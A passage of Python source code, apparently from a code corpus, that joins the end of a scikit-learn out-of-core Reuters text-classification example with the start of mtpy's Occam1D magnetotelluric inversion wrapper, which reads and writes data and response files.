DOWNLOAD_URL = ('http://archive.ics.uci.edu/ml/machine-learning-databases/'
'reuters21578-mld/reuters21578.tar.gz')
ARCHIVE_FILENAME = 'reuters21578.tar.gz'
if data_path is None:
data_path = os.path.join(get_data_home(), "reuters")
if not os.path.exists(data_path):
"""Download the dataset."""
print("downloading dataset (once and for all) into %s" %
data_path)
os.mkdir(data_path)
def progress(blocknum, bs, size):
total_sz_mb = '%.2f MB' % (size / 1e6)
current_sz_mb = '%.2f MB' % ((blocknum * bs) / 1e6)
if _not_in_sphinx():
print('\rdownloaded %s / %s' % (current_sz_mb, total_sz_mb),
end='')
archive_path = os.path.join(data_path, ARCHIVE_FILENAME)
urllib.request.urlretrieve(DOWNLOAD_URL, filename=archive_path,
reporthook=progress)
if _not_in_sphinx():
print('\r', end='')
print("untarring Reuters dataset...")
tarfile.open(archive_path, 'r:gz').extractall(data_path)
print("done.")
parser = ReutersParser()
for filename in glob(os.path.join(data_path, "*.sgm")):
for doc in parser.parse(open(filename, 'rb')):
yield doc
###############################################################################
# Main
###############################################################################
# Create the vectorizer and limit the number of features to a reasonable
# maximum
vectorizer = HashingVectorizer(decode_error='ignore', n_features=2 ** 18,
non_negative=True)
# Iterator over parsed Reuters SGML files.
data_stream = stream_reuters_documents()
# We learn a binary classification between the "acq" class and all the others.
# "acq" was chosen as it is more or less evenly distributed in the Reuters
# files. For other datasets, one should take care of creating a test set with
# a realistic portion of positive instances.
all_classes = np.array([0, 1])
positive_class = 'acq'
# Here are some classifiers that support the `partial_fit` method
partial_fit_classifiers = {
'SGD': SGDClassifier(),
'Perceptron': Perceptron(),
'NB Multinomial': MultinomialNB(alpha=0.01),
'Passive-Aggressive': PassiveAggressiveClassifier(),
}
def get_minibatch(doc_iter, size, pos_class=positive_class):
"""Extract a minibatch of examples, return a tuple X_text, y.
Note: size is before excluding invalid docs with no topics assigned.
"""
data = [(u'{title}\n\n{body}'.format(**doc), pos_class in doc['topics'])
for doc in itertools.islice(doc_iter, size)
if doc['topics']]
if not len(data):
return np.asarray([], dtype=int), np.asarray([], dtype=int)
X_text, y = zip(*data)
return X_text, np.asarray(y, dtype=int)
def iter_minibatches(doc_iter, minibatch_size):
"""Generator of minibatches."""
X_text, y = get_minibatch(doc_iter, minibatch_size)
while len(X_text):
yield X_text, y
X_text, y = get_minibatch(doc_iter, minibatch_size)
# test data statistics
test_stats = {'n_test': 0, 'n_test_pos': 0}
# First we hold out a number of examples to estimate accuracy
n_test_documents = 1000
tick = time.time()
X_test_text, y_test = get_minibatch(data_stream, 1000)
parsing_time = time.time() - tick
tick = time.time()
X_test = vectorizer.transform(X_test_text)
vectorizing_time = time.time() - tick
test_stats['n_test'] += len(y_test)
test_stats['n_test_pos'] += sum(y_test)
print("Test set is %d documents (%d positive)" % (len(y_test), sum(y_test)))
def progress(cls_name, stats):
"""Report progress information, return a string."""
duration = time.time() - stats['t0']
s = "%20s classifier : \t" % cls_name
s += "%(n_train)6d train docs (%(n_train_pos)6d positive) " % stats
s += "%(n_test)6d test docs (%(n_test_pos)6d positive) " % test_stats
s += "accuracy: %(accuracy).3f " % stats
s += "in %.2fs (%5d docs/s)" % (duration, stats['n_train'] / duration)
return s
cls_stats = {}
for cls_name in partial_fit_classifiers:
stats = {'n_train': 0, 'n_train_pos': 0,
'accuracy': 0.0, 'accuracy_history': [(0, 0)], 't0': time.time(),
'runtime_history': [(0, 0)], 'total_fit_time': 0.0}
cls_stats[cls_name] = stats
get_minibatch(data_stream, n_test_documents)
# Discard test set
# We will feed the classifier with mini-batches of 1000 documents; this means
# we have at most 1000 docs in memory at any time. The smaller the document
# batch, the bigger the relative overhead of the partial fit methods.
minibatch_size = 1000
# Create the data_stream that parses Reuters SGML files and iterates on
# documents as a stream.
minibatch_iterators = iter_minibatches(data_stream, minibatch_size)
total_vect_time = 0.0
# Main loop : iterate on mini-batches of examples
for i, (X_train_text, y_train) in enumerate(minibatch_iterators):
tick = time.time()
X_train = vectorizer.transform(X_train_text)
total_vect_time += time.time() - tick
for cls_name, cls in partial_fit_classifiers.items():
tick = time.time()
# update estimator with examples in the current mini-batch
cls.partial_fit(X_train, y_train, classes=all_classes)
# accumulate test accuracy stats
cls_stats[cls_name]['total_fit_time'] += time.time() - tick
cls_stats[cls_name]['n_train'] += X_train.shape[0]
cls_stats[cls_name]['n_train_pos'] += sum(y_train)
tick = time.time()
cls_stats[cls_name]['accuracy'] = cls.score(X_test, y_test)
cls_stats[cls_name]['prediction_time'] = time.time() - tick
acc_history = (cls_stats[cls_name]['accuracy'],
cls_stats[cls_name]['n_train'])
cls_stats[cls_name]['accuracy_history'].append(acc_history)
run_history = (cls_stats[cls_name]['accuracy'],
total_vect_time + cls_stats[cls_name]['total_fit_time'])
cls_stats[cls_name]['runtime_history'].append(run_history)
if i % 3 == 0:
print(progress(cls_name, cls_stats[cls_name]))
if i % 3 == 0:
print('\n')
###############################################################################
# Plot results
###############################################################################
def plot_accuracy(x, y, x_legend):
"""Plot accuracy as a function of x."""
x = np.array(x)
y = np.array(y)
plt.title('Classification accuracy as a function of %s' % x_legend)
plt.xlabel('%s' % x_legend)
plt.ylabel('Accuracy')
plt.grid(True)
plt.plot(x, y)
rcParams['legend.fontsize'] = 10
cls_names = list(sorted(cls_stats.keys()))
# Plot accuracy evolution
plt.figure()
for _, stats in sorted(cls_stats.items()):
# Plot accuracy evolution with #examples
accuracy, n_examples = zip(*stats['accuracy_history'])
plot_accuracy(n_examples, accuracy, "training examples (#)")
ax = plt.gca()
ax.set_ylim((0.8, 1))
plt.legend(cls_names, loc='best')
plt.figure()
for _, stats in sorted(cls_stats.items()):
# Plot accuracy evolution with runtime
accuracy, runtime = zip(*stats['runtime_history'])
plot_accuracy(runtime, accuracy, 'runtime (s)')
ax = plt.gca()
ax.set_ylim((0.8, 1))
plt.legend(cls_names, loc='best')
# Plot fitting times
plt.figure()
fig = plt.gcf()
cls_runtime = []
for cls_name, stats in sorted(cls_stats.items()):
cls_runtime.append(stats['total_fit_time'])
cls_runtime.append(total_vect_time)
cls_names.append('Vectorization')
bar_colors = ['b', 'g', 'r', 'c', 'm', 'y']
ax = plt.subplot(111)
rectangles = plt.bar(range(len(cls_names)), cls_runtime, width=0.5,
color=bar_colors)
ax.set_xticks(np.linspace(0.25, len(cls_names) - 0.75, len(cls_names)))
ax.set_xticklabels(cls_names, fontsize=10)
ymax = max(cls_runtime) * 1.2
ax.set_ylim((0, ymax))
ax.set_ylabel('runtime (s)')
ax.set_title('Training Times')
def autolabel(rectangles):
"""attach some text vi autolabel on rectangles."""
for rect in rectangles:
height = rect.get_height()
ax.text(rect.get_x() + rect.get_width() / 2.,
1.05 * height, '%.4f' % height,
ha='center', va='bottom')
autolabel(rectangles)
plt.show()
# Plot prediction times
plt.figure()
cls_runtime = []
cls_names = list(sorted(cls_stats.keys()))
for cls_name, stats in sorted(cls_stats.items()):
cls_runtime.append(stats['prediction_time'])
cls_runtime.append(parsing_time)
cls_names.append('Read/Parse\n+Feat.Extr.')
cls_runtime.append(vectorizing_time)
cls_names.append('Hashing\n+Vect.')
ax = plt.subplot(111)
rectangles = plt.bar(range(len(cls_names)), cls_runtime, width=0.5,
color=bar_colors)
ax.set_xticks(np.linspace(0.25, len(cls_names) - 0.75, len(cls_names)))
ax.set_xticklabels(cls_names, fontsize=8)
plt.setp(plt.xticks()[1], rotation=30)
ymax = max(cls_runtime) * 1.2
ax.set_ylim((0, ymax))
ax.set_ylabel('runtime (s)')
ax.set_title('Prediction Times (%d instances)' % n_test_documents)
autolabel(rectangles)
plt.show()
| bsd-3-clause |
geophysics/mtpy | mtpy/modeling/occam1d.py | 1 | 112593 | # -*- coding: utf-8 -*-
"""
==================
Occam1D
==================
* Wrapper class to interact with Occam1D written by Kerry Keys at Scripps
adapted from the method of Constable et al., [1987].
* This class only deals with the MT functionality of the Fortran code, so
it can make the input files for computing the 1D MT response of an input
model and or data. It can also read the output and plot them in a
useful way.
* Note that when you run the inversion code, the convergence is quite
quick, within the first few iterations, so have a look at the L2 cure
to decide which iteration to plot, otherwise if you look at iterations
long after convergence the models will be unreliable.
* Key, K., 2009, 1D inversion of multicomponent, multi-frequency marine
CSEM data: Methodology and synthetic studies for resolving thin
resistive layers: Geophysics, 74, F9–F20.
* The original paper describing the Occam's inversion approach is:
* Constable, S. C., R. L. Parker, and C. G. Constable, 1987,
Occam’s inversion –– A practical algorithm for generating smooth
models from electromagnetic sounding data, Geophysics, 52 (03), 289–300.
:Intended Use: ::
>>> import mtpy.modeling.occam1d as occam1d
>>> #--> make a data file
>>> d1 = occam1d.Data()
>>> d1.write_data_file(edi_file=r'/home/MT/mt01.edi', res_err=10, phase_err=2.5,
>>> ... save_path=r"/home/occam1d/mt01/TE", mode='TE')
>>> #--> make a model file
>>> m1 = occam1d.Model()
>>> m1.write_model_file(save_path=d1.save_path, target_depth=15000)
>>> #--> make a startup file
>>> s1 = occam1d.Startup()
>>> s1.data_fn = d1.data_fn
>>> s1.model_fn = m1.model_fn
>>> s1.save_path = m1.save_path
>>> s1.write_startup_file()
>>> #--> run occam1d from python
>>> occam_path = r"/home/occam1d/Occam1D_executable"
>>> occam1d.Run(s1.startup_fn, occam_path, mode='TE')
>>> #--plot the L2 curve
>>> l2 = occam1d.PlotL2(d1.save_path, m1.model_fn)
>>> #--> see that iteration 7 is the optimum model to plot
>>> p1 = occam1d.Plot1DResponse()
>>> p1.data_te_fn = d1.data_fn
>>> p1.model_fn = m1.model_fn
>>> p1.iter_te_fn = r"/home/occam1d/mt01/TE/TE_7.iter"
>>> p1.resp_te_fn = r"/home/occam1d/mt01/TE/TE_7.resp"
>>> p1.plot()
@author: J. Peacock (Oct. 2013)
"""
#------------------------------------------------------------------------------
import numpy as np
import os
import os.path as op
import time
from matplotlib.ticker import MultipleLocator
import matplotlib.gridspec as gridspec
import mtpy.core.edi as mtedi
import mtpy.utils.calculator as mtcc
import mtpy.analysis.geometry as mtg
import mtpy.analysis.pt as mtpt
import matplotlib.pyplot as plt
import subprocess
import string
#------------------------------------------------------------------------------
class Data(object):
"""
reads and writes occam 1D data files
===================== =====================================================
Attributes Description
===================== =====================================================
_data_fn basename of data file *default* is Occam1DDataFile
_header_line header line for description of data columns
_ss string spacing *default* is 6*' '
_string_fmt format of data *default* is '+.6e'
data array of data
data_fn full path to data file
freq frequency array of data
mode mode to invert for [ 'TE' | 'TM' ]
phase_te array of TE phase
phase_tm array of TM phase
res_te array of TE apparent resistivity
res_tm array of TM apparent resistivity
resp_fn full path to response file
save_path path to save files to
===================== =====================================================
===================== =====================================================
Methods Description
===================== =====================================================
write_data_file write an Occam1D data file
read_data_file read an Occam1D data file
read_resp_file read a .resp file output by Occam1D
===================== =====================================================
:Example: ::
>>> import mtpy.modeling.occam1d as occam1d
>>> #--> make a data file for TE mode
>>> d1 = occam1d.Data()
>>> d1.write_data_file(edi_file=r'/home/MT/mt01.edi', res_err=10, phase_err=2.5,
>>> ... save_path=r"/home/occam1d/mt01/TE", mode='TE')
"""
def __init__(self, data_fn=None, **kwargs):
self.data_fn = data_fn
if self.data_fn is not None:
self.save_path = os.path.dirname(self.data_fn)
else:
self.save_path = os.getcwd()
self._string_fmt = '+.6e'
self._ss = 6*' '
self._data_fn = 'Occam1d_DataFile'
self._header_line = '!{0}\n'.format(' '.join(['Type','Freq#',
'TX#', 'Rx#','Data',
'Std_Error']))
self.mode = 'TE'
self.data = None
self.freq = None
self.res_te = None
self.res_tm = None
self.phase_te = None
self.phase_tm = None
self.resp_fn = None
def write_data_file(self, rp_tuple=None, edi_file=None, save_path=None,
mode='TE', res_err='data', phase_err='data', thetar=0,
res_errorfloor = 0., phase_errorfloor = 0., z_errorfloor=0.,
remove_outofquadrant=False):
"""
make1Ddatafile will write a data file for Occam1D
Arguments:
---------
**rp_tuple** : np.ndarray (freq, res, res_err, phase, phase_err)
with res, phase having shape (num_freq, 2, 2).
**edi_file** : string
full path to edi file to be modeled.
**save_path** : string
path to save the file, if None set to dirname of
station if edipath = None. Otherwise set to
dirname of edipath.
**thetar** : float
rotation angle to rotate Z. Clockwise positive and N=0
*default* = 0
**mode** : [ 'TE' | 'TM' | 'det']
mode to model can be (*default*='both'):
- 'TE' for just TE mode
- 'TM' for just TM mode
- 'det' for the determinant of Z.
**res_err** : float
errorbar for resistivity values. Can be set to (
*default* = 'data'):
- 'data' for errorbars from the data
- percent number ex. 10 for ten percent
**phase_err** : float
errorbar for phase values. Can be set to (
*default* = 'data'):
- 'data' for errorbars from the data
- percent number ex. 10 for ten percent
**res_errorfloor**: float
error floor for resistivity values
in percent
**phase_errorfloor**: float
error floor for phase in degrees
**remove_outofquadrant**: True/False; option to remove the resistivity and
phase values for points with phases out
of the 1st/3rd quadrant (occam requires
0 < phase < 90 degrees; phases in the 3rd
quadrant are shifted to the first by
adding 180 degrees)
:Example: ::
>>> import mtpy.modeling.occam1d as occam1d
>>> #--> make a data file
>>> d1 = occam1d.Data()
>>> d1.write_data_file(edi_file=r'/home/MT/mt01.edi', res_err=10,
>>> ... phase_err=2.5, mode='TE',
>>> ... save_path=r"/home/occam1d/mt01/TE")
"""
self.mode = mode
if edi_file is None and rp_tuple is None:
raise IOError('Need to input either an edi file or rp_array')
if edi_file is not None:
#raise an error if can't find the edifile
if os.path.isfile(edi_file) == False:
raise IOError('No edi file {0} exists, check path'.format(edi_file))
#read in edifile
e1 = mtedi.Edi(edi_file)
impz = e1.Z
#rotate if necessary
if thetar != 0:
impz.rotate(thetar)
#get resistivity and phase
rho = impz.resistivity
rho_err = impz.resistivity_err
phi = impz.phase
phi_err = impz.phase_err
freq = impz.freq
nf = len(freq)
#get determinant resistivity and phase
if 'det' in mode.lower():
zdet, zdet_err = np.abs(impz.det)
zdet_err = np.abs(zdet_err)
rho = .2/freq*abs(zdet)
phi = np.rad2deg(np.arctan2((zdet**0.5).imag, (zdet**0.5).real))
if rp_tuple is not None:
if len(rp_tuple) != 5:
raise IOError('Be sure rp_array is correctly formated\n'
'should be freq, res, res_err, phase, phase_err')
freq, rho, rho_err, phi, phi_err = rp_tuple
if 'det' in mode.lower():
rho = rho[:, 0, 1]
phi = phi[:, 0, 1]
rho_err = rho_err[:, 0, 1]
phi_err = phi_err[:, 0, 1]
nf = len(freq)
if 'z' in mode.lower():
if 'det' in mode.lower():
data1, data1_err = (zdet**0.5).real*np.pi*4e-4, zdet_err**0.5*np.pi*4e-4
data2, data2_err = (zdet**0.5).imag*np.pi*4e-4, zdet_err**0.5*np.pi*4e-4
else:
data1, data1_err = impz.z.real*np.pi*4e-4, impz.zerr*np.pi*4e-4
data2, data2_err = impz.z.imag*np.pi*4e-4, impz.zerr*np.pi*4e-4
dstring1,dstring2 = 'Real','Imag'
else:
data1, data1_err = rho, rho_err
data2, data2_err = phi, phi_err
dstring1,dstring2 = 'Rho','Phs'
# remove data points with phase out of quadrant
if remove_outofquadrant:
if 'det' in mode.lower():
if 'z' in mode.lower():
include = (data1/data2 > 0) & (data1/data2 > 0)
else:
include = (phi%180 <= 90) & (phi%180 >= 0) & (phi%180 <= 90) & (phi%180 >= 0)
else:
if 'z' in mode.lower():
include = (data1[:,0,1]/data2[:,0,1] > 0) & (data1[:,1,0]/data2[:,1,0] > 0)
else:
include = (phi[:,0,1]%180 <= 90) & (phi[:,0,1]%180 >= 0) & (phi[:,1,0]%180 <= 90) & (phi[:,1,0]%180 >= 0)
freq,data1,data1_err,data2,data2_err = [arr[include] for arr in [freq, data1, data1_err, data2, data2_err]]
nf = len(freq)
# fix any zero errors to 100% of the res value or 90 degrees for phase
data1_err[data1_err==0] = data1[data1_err==0]
if 'z' in mode.lower():
data2_err[data2_err==0] = data2[data2_err==0]
else:
data2_err[data2_err==0] = 90
# set error floors
if 'z' in mode.lower():
if z_errorfloor > 0:
data1_err = np.abs(data1_err)
data1_err[data1_err/np.abs(data1+1j*data2) < z_errorfloor/100.] = np.abs(data1+1j*data2)[data1_err/np.abs(data1+1j*data2) < z_errorfloor/100.]*z_errorfloor/100.
data2_err = data1_err.copy()
else:
if res_errorfloor > 0:
data1_err[data1_err/data1 < res_errorfloor/100.] = data1[data1_err/data1 < res_errorfloor/100.]*res_errorfloor/100.
if phase_errorfloor > 0:
data2_err[data2_err < phase_errorfloor] = phase_errorfloor
#make sure the savepath exists, if not create it
if save_path is not None:
self.save_path = save_path
if self.save_path == None:
try:
self.save_path = os.path.dirname(edi_file)
except TypeError:
pass
elif os.path.basename(self.save_path).find('.') > 0:
self.save_path = os.path.dirname(self.save_path)
self._data_fn = os.path.basename(self.save_path)
if not os.path.exists(self.save_path):
os.mkdir(self.save_path)
self.data_fn = os.path.join(self.save_path,
'{0}_{1}.dat'.format(self._data_fn, mode.upper()))
dlines = []
dlines.append('Format: EMData_1.1 \n')
dlines.append('!mode: {0}\n'.format(mode.upper()))
dlines.append('!rotation_angle = {0:.2f}\n'.format(thetar))
#needs a transmitter to work so put in a dummy one
dlines.append('# Transmitters: 1\n')
dlines.append('0 0 0 0 0 \n')
#write frequencies
dlines.append('# Frequencies: {0}\n'.format(nf))
if freq[0] < freq[1]:
freq = freq[::-1]
rho = rho[::-1]
phi = phi[::-1]
rho_err = rho_err[::-1]
phi_err = phi_err[::-1]
for ff in freq:
dlines.append(' {0:{1}}\n'.format(ff, self._string_fmt))
#needs a receiver to work so put in a dummy one
dlines.append('# Receivers: 1 \n')
dlines.append('0 0 0 0 0 0 \n')
#write data
dlines.append('# Data:{0}{1}\n'.format(self._ss, 2*nf))
num_data_line = len(dlines)
dlines.append(self._header_line)
data_count = 0
# data1 = np.abs(data1)
# data2 = np.abs(data2)
for ii in range(nf):
if 'te' in mode.lower():
pol = 'xy'
i1,i2 = 0,1
tetm = True
elif 'tm' in mode.lower():
pol = 'yx'
i1,i2 = 1,0
tetm = True
# data1 *= -1
# data2 *= -1
else:
tetm = False
if tetm:
if 'z' in mode.lower():
d1err,d2err = data1_err[ii, i1, i2],data2_err[ii, i1, i2]
else:
if res_err == 'data':
d1err = data1_err[ii, i1, i2]
else:
d1err = data1[ii, i1, i2]*res_err/100.
if phase_err == 'data':
d2err = data2_err[ii, i1, i2]
else:
d2err = phase_err/100*(180/np.pi)
# write lines
if data1[ii, i1, i2] != 0.0:
dlines.append(self._ss.join([dstring1+'Z'+pol, str(ii+1), '0', '1',
'{0:{1}}'.format(data1[ii, i1, i2], self._string_fmt),
'{0:{1}}\n'.format(d1err, self._string_fmt)]))
data_count += 1
if data2[ii, i1, i2] != 0.0:
dlines.append(self._ss.join([dstring2+'Z'+pol, str(ii+1), '0', '1',
'{0:{1}}'.format(data2[ii, i1, i2],self._string_fmt),
'{0:{1}}\n'.format(d2err, self._string_fmt)]))
data_count += 1
# elif mode.lower() == 'tm':
# pol = 'yx'
# if res_err == 'data':
# rerr = rho_err[ii, 1, 0]
# else:
# rerr = rho[ii, 1, 0]*res_err/100.
#
# if phase_err == 'data':
# perr = phi_err[ii, 1, 0]
# else:
# perr = phase_err/100*(180/np.pi)
#
# # write lines
# if rho[ii, 1, 0] != 0.0:
# dlines.append(self._ss.join(['RhoZ'+pol, str(ii+1), '0', '1',
# '{0:{1}}'.format(rho[ii, 1, 0],self._string_fmt),
# '{0:{1}}\n'.format(rerr, self._string_fmt)]))
# data_count += 1
# if phi[ii, 1, 0] != 0.0:
# dlines.append(self._ss.join(['PhsZ'+pol, str(ii+1), '0', '1',
# '{0:{1}}'.format(phi[ii, 1, 0]%90,self._string_fmt),
# '{0:{1}}\n'.format(perr, self._string_fmt)]))
# data_count += 1
else:
if 'det' in mode.lower():
pol = 'xy'
if 'z' in mode.lower():
d1err,d2err = data1_err[ii], data2_err[ii]
else:
if res_err == 'data':
if edi_file is not None:
d1err, d2err = mtedi.MTcc.zerror2r_phi_error(zdet[ii].real,
zdet_err[ii],
zdet[ii].imag,
zdet_err[ii])
else:
d1err = rho_err[ii]
else:
d1err = rho[ii]*res_err/100.
if phase_err == 'data':
if edi_file is not None:
d1err, d2err = mtedi.MTcc.zerror2r_phi_error(zdet[ii].real,
zdet_err[ii],
zdet[ii].imag,
zdet_err[ii])
else:
d2err = phi_err[ii]
else:
d2err = phase_err/100*(180/np.pi)
# write lines
if rho[ii] != 0.0:
dlines.append(self._ss.join([dstring1+'Z'+pol, str(ii+1), '0', '1',
'{0:{1}}'.format(data1[ii],self._string_fmt),
'{0:{1}}\n'.format(d1err, self._string_fmt)]))
data_count += 1
if phi[ii] != 0.0:
dlines.append(self._ss.join([dstring2+'Z'+pol, str(ii+1), '0', '1',
'{0:{1}}'.format(data2[ii]%180,self._string_fmt),
'{0:{1}}\n'.format(d2err, self._string_fmt)]))
data_count += 1
if 'z' in mode.lower():
self.z, self.z_err = data1 + 1j*data2, data1_err
else:
if 'det' in mode.lower():
self.res_det = rho
self.phase_det = phi
else:
self.res_te = rho[:,0,1]
self.phase_te = phi[:,0,1]
self.res_tm = rho[:,1,0]
self.phase_tm = phi[:,1,0]%180
self.freq = freq
#--> write file
dlines[num_data_line-1] = '# Data:{0}{1}\n'.format(self._ss, data_count)
dfid = open(self.data_fn, 'w')
dfid.writelines(dlines)
dfid.close()
print 'Wrote Data File to : {0}'.format(self.data_fn)
def read_data_file(self, data_fn=None):
"""
reads a 1D data file
Arguments:
----------
**data_fn** : full path to data file
Returns:
--------
**Occam1D.rpdict** : dictionary with keys:
*'freq'* : an array of frequencies with length nf
*'resxy'* : TE resistivity array with shape (nf,4) for (0) data,
(1) dataerr, (2) model, (3) modelerr
*'resyx'* : TM resistivity array with shape (nf,4) for (0) data,
(1) dataerr, (2) model, (3) modelerr
*'phasexy'* : TE phase array with shape (nf,4) for (0) data,
(1) dataerr, (2) model, (3) modelerr
*'phaseyx'* : TM phase array with shape (nf,4) for (0) data,
(1) dataerr, (2) model, (3) modelerr
:Example: ::
>>> old = occam1d.Data()
>>> old.data_fn = r"/home/Occam1D/Line1/Inv1_TE/MT01TE.dat"
>>> old.read_data_file()
"""
if data_fn is not None:
self.data_fn = data_fn
if self.data_fn is None:
raise IOError('Need to input a data file')
elif os.path.isfile(self.data_fn) == False:
raise IOError('Could not find {0}, check path'.format(self.data_fn))
self._data_fn = os.path.basename(self.data_fn)
self.save_path = os.path.dirname(self.data_fn)
dfid = open(self.data_fn, 'r')
#read in lines
dlines = dfid.readlines()
dfid.close()
#make a dictionary of all the fields found so can put them into arrays
finddict = {}
for ii, dline in enumerate(dlines):
if dline.find('#')<=3:
fkey = dline[2:].strip().split(':')[0]
fvalue = ii
finddict[fkey] = fvalue
#get number of frequencies
nfreq = int(dlines[finddict['Frequencies']][2:].strip().split(':')[1].strip())
#frequency list
freq = np.array([float(ff) for ff in dlines[finddict['Frequencies']+1:
finddict['Receivers']]])
#data dictionary to put things into
#check to see if there is alread one, if not make a new one
if self.data is None:
self.data = {'freq':freq,
'zxy':np.zeros((4,nfreq),dtype=complex),
'zyx':np.zeros((4,nfreq),dtype=complex),
'resxy':np.zeros((4,nfreq)),
'resyx':np.zeros((4,nfreq)),
'phasexy':np.zeros((4,nfreq)),
'phaseyx':np.zeros((4,nfreq))}
#get data
for dline in dlines[finddict['Data']+1:]:
if dline.find('!') == 0:
pass
else:
dlst = dline.strip().split()
dlst = [dd.strip() for dd in dlst]
if len(dlst) > 4:
jj = int(dlst[1])-1
dvalue = float(dlst[4])
derr = float(dlst[5])
if dlst[0] == 'RhoZxy' or dlst[0] == '103':
self.mode ='TE'
self.data['resxy'][0, jj] = dvalue
self.data['resxy'][1, jj] = derr
if dlst[0] == 'PhsZxy' or dlst[0] == '104':
self.mode ='TE'
self.data['phasexy'][0, jj] = dvalue
self.data['phasexy'][1, jj] = derr
if dlst[0] == 'RhoZyx' or dlst[0] == '105':
self.mode ='TM'
self.data['resyx'][0, jj] = dvalue
self.data['resyx'][1, jj] = derr
if dlst[0] == 'PhsZyx' or dlst[0] == '106':
self.mode ='TM'
self.data['phaseyx'][0, jj] = dvalue
self.data['phaseyx'][1, jj] = derr
if dlst[0] == 'RealZxy' or dlst[0] == '113':
self.mode ='TEz'
self.data['zxy'][0, jj] = dvalue/(np.pi*4e-4)
self.data['zxy'][1, jj] = derr/(np.pi*4e-4)
if dlst[0] == 'ImagZxy' or dlst[0] == '114':
self.mode ='TEz'
self.data['zxy'][0, jj] += 1j*dvalue/(np.pi*4e-4)
self.data['zxy'][1, jj] = derr/(np.pi*4e-4)
if dlst[0] == 'RealZyx' or dlst[0] == '115':
self.mode ='TMz'
self.data['zyx'][0, jj] = dvalue/(np.pi*4e-4)
self.data['zyx'][1, jj] = derr/(np.pi*4e-4)
if dlst[0] == 'ImagZyx' or dlst[0] == '116':
self.mode ='TMz'
self.data['zyx'][0, jj] += 1j*dvalue/(np.pi*4e-4)
self.data['zyx'][1, jj] = derr/(np.pi*4e-4)
if 'z' in self.mode:
if 'TE' in self.mode:
pol='xy'
elif 'TM' in self.mode:
pol='yx'
self.data['res'+pol][0] = 0.2*np.abs(self.data['z'+pol][0])**2./freq
self.data['phase'+pol][0] = np.rad2deg(np.arctan(self.data['res'+pol][0].imag/self.data['res'+pol][0].real))
for jjj in range(len(freq)):
self.data['res'+pol][1,jjj],self.data['phase'+pol][1,jjj] =\
mtcc.zerror2r_phi_error(self.data['z'+pol][0,jjj].real,self.data['z'+pol][1,jjj],
self.data['z'+pol][0,jjj].imag,self.data['z'+pol][1,jjj])
self.data['resyx'][0] = 0.2*np.abs(self.data['zxy'][0])**2./freq
self.freq = freq
self.res_te = self.data['resxy']
self.res_tm = self.data['resyx']
self.phase_te = self.data['phasexy']
self.phase_tm = self.data['phaseyx']
def read_resp_file(self, resp_fn=None, data_fn=None):
"""
read response file
Arguments:
---------
**resp_fn** : full path to response file
**data_fn** : full path to data file
Fills:
--------
*freq* : an array of frequencies with length nf
*res_te* : TE resistivity array with shape (nf,4) for (0) data,
(1) dataerr, (2) model, (3) modelerr
*res_tm* : TM resistivity array with shape (nf,4) for (0) data,
(1) dataerr, (2) model, (3) modelerr
*phase_te* : TE phase array with shape (nf,4) for (0) data,
(1) dataerr, (2) model, (3) modelerr
*phase_tm* : TM phase array with shape (nf,4) for (0) data,
(1) dataerr, (2) model, (3) modelerr
:Example: ::
>>> o1d = occam1d.Data()
>>> o1d.data_fn = r"/home/occam1d/mt01/TE/Occam1D_DataFile_TE.dat"
>>> o1d.read_resp_file(r"/home/occam1d/mt01/TE/TE_7.resp")
"""
if resp_fn is not None:
self.resp_fn = resp_fn
if self.resp_fn is None:
raise IOError('Need to input response file')
if data_fn is not None:
self.data_fn = data_fn
if self.data_fn is None:
raise IOError('Need to input data file')
#--> read in data file
self.read_data_file()
#--> read response file
dfid = open(self.resp_fn, 'r')
dlines = dfid.readlines()
dfid.close()
finddict = {}
for ii, dline in enumerate(dlines):
if dline.find('#')<=3:
fkey = dline[2:].strip().split(':')[0]
fvalue = ii
finddict[fkey] = fvalue
for dline in dlines[finddict['Data']+1:]:
if dline.find('!') == 0:
pass
else:
dlst=dline.strip().split()
if len(dlst) > 4:
jj = int(dlst[1])-1
dvalue = float(dlst[4])
derr = float(dlst[5])
rvalue = float(dlst[6])
try:
rerr = float(dlst[7])
except ValueError:
rerr = 1000.
if dlst[0]=='RhoZxy' or dlst[0]=='103':
self.res_te[0,jj] = dvalue
self.res_te[1,jj] = derr
self.res_te[2,jj] = rvalue
self.res_te[3,jj] = rerr
if dlst[0]=='PhsZxy' or dlst[0]=='104':
self.phase_te[0,jj] = dvalue
self.phase_te[1,jj] = derr
self.phase_te[2,jj] = rvalue
self.phase_te[3,jj] = rerr
if dlst[0]=='RhoZyx' or dlst[0]=='105':
self.res_tm[0,jj] = dvalue
self.res_tm[1,jj] = derr
self.res_tm[2,jj] = rvalue
self.res_tm[3,jj] = rerr
if dlst[0]=='PhsZyx' or dlst[0]=='106':
self.phase_tm[0,jj] = dvalue
self.phase_tm[1,jj] = derr
self.phase_tm[2,jj] = rvalue
self.phase_tm[3,jj] = rerr
if dlst[0] == 'RealZxy' or dlst[0] == '113':
self.mode ='TEz'
self.data['zxy'][0, jj] = dvalue/(np.pi*4e-4)
self.data['zxy'][1, jj] = derr/(np.pi*4e-4)
self.data['zxy'][2, jj] = rvalue/(np.pi*4e-4)
self.data['zxy'][3, jj] = rerr/(np.pi*4e-4)
if dlst[0] == 'ImagZxy' or dlst[0] == '114':
self.mode ='TEz'
self.data['zxy'][0, jj] += 1j*dvalue/(np.pi*4e-4)
self.data['zxy'][1, jj] = derr/(np.pi*4e-4)
self.data['zxy'][2, jj] += 1j*rvalue/(np.pi*4e-4)
self.data['zxy'][3, jj] = rerr/(np.pi*4e-4)
if dlst[0] == 'RealZyx' or dlst[0] == '115':
self.mode ='TMz'
self.data['zyx'][0, jj] = dvalue/(np.pi*4e-4)
self.data['zyx'][1, jj] = derr/(np.pi*4e-4)
self.data['zyx'][2, jj] = rvalue/(np.pi*4e-4)
self.data['zyx'][3, jj] = rerr/(np.pi*4e-4)
if dlst[0] == 'ImagZyx' or dlst[0] == '116':
self.mode ='TMz'
self.data['zyx'][0, jj] += 1j*dvalue/(np.pi*4e-4)
self.data['zyx'][1, jj] = derr/(np.pi*4e-4)
self.data['zyx'][2, jj] += 1j*rvalue/(np.pi*4e-4)
self.data['zyx'][3, jj] = rerr/(np.pi*4e-4)
if 'z' in self.mode:
if 'TE' in self.mode:
pol='xy'
elif 'TM' in self.mode:
pol='yx'
for ii in [0,2]:
self.data['res'+pol][0+ii] = 0.2*np.abs(self.data['z'+pol][0+ii])**2./self.freq
self.data['phase'+pol][0+ii] = np.rad2deg(np.arctan(self.data['z'+pol][0+ii].imag/ self.data['z'+pol][0+ii].real))
